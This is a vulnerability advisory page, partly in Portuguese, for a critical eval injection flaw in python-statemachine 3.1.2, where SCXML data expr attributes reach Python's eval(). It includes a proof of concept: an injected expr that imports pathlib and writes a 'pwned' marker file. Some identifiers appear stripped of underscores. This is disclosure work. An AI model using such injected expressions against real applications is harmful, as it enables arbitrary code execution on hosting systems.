PT-2026-53579 · Pypi · Python-Statemachine

Publicado

2026-06-29

·

Atualizado

2026-06-29

CVSS v3.1

9.8

Crítica

VetorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

python-statemachine 3.1.2 evaluates <data expr="..."> attributes in SCXML documents using Python's eval(). Any application that passes attacker-controlled SCXML content to SCXMLProcessor is vulnerable to arbitrary code execution in the context of the hosting process.

Details

SCXMLProcessor.parse scxml file() processes SCXML documents and evaluates <data> element expr attributes via the following call chain:
SCXMLProcessor.parse scxml file()
SCXMLProcessor.process definition()
 create datamodel action callable()
 create dataitem callable()
 eval()
eval()
eval() calls Python's built-in eval() directly on the expression string without sandboxing or restriction.

PoC

1. Install:
  pip install python-statemachine==3.1.2

2. Create an SCXML file containing:
  <data id="x" expr=" import ('pathlib').Path('marker.txt').write text('pwned')"/>

 3. Run:
  SCXMLProcessor.parse scxml file(DATA EXPR CHART)
  SCXMLProcessor.start()
 
4. During start(), <data expr> reaches eval(), which calls eval().

5. Result:
  data marker before start: False
  data marker after start: True
  success: True

Impact

This is an eval injection vulnerability (CWE-95). Remote or local code execution depending on whether the consuming application accepts SCXML content from remote users, uploaded files, configuration, plugins, or other untrusted sources.

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Identificadores relacionados

PYSEC-2026-506

Produtos afetados

Python-Statemachine